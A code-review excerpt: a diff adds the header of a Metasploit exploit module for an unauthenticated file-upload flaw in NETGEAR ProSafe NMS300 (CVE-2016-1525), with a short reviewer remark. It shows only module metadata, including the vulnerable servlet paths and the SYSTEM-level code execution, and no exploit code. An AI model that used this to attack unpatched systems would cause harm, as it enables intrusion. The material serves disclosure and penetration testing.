modules/exploits/windows/http/netgear_nms_rce.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
+      'Description' => %q{
+      Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
+      The application has a file upload vulnerability that can be exploited by an
+      unauthenticated remote attacker to execute code as the SYSTEM user.
+      Two servlets are vulnerable, FileUploadController (located at
+      /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
+      This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
+      1.1.0.13.
+      },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2016-1525'],
+          ['US-CERT-VU', '777024'],
+          ['URL', 'TODO_GITHUB_URL'],
+          ['URL', 'TODO_FULLDISC_URL']
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 5 },
+      'Platform' => 'win',
+      'Arch' => ARCH_X86,
+      'Privileged' => true,
+      'Targets' =>
+        [
+          [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
```

Comment:
Version numbers are listed in the description, can add them but would make it too long IMO.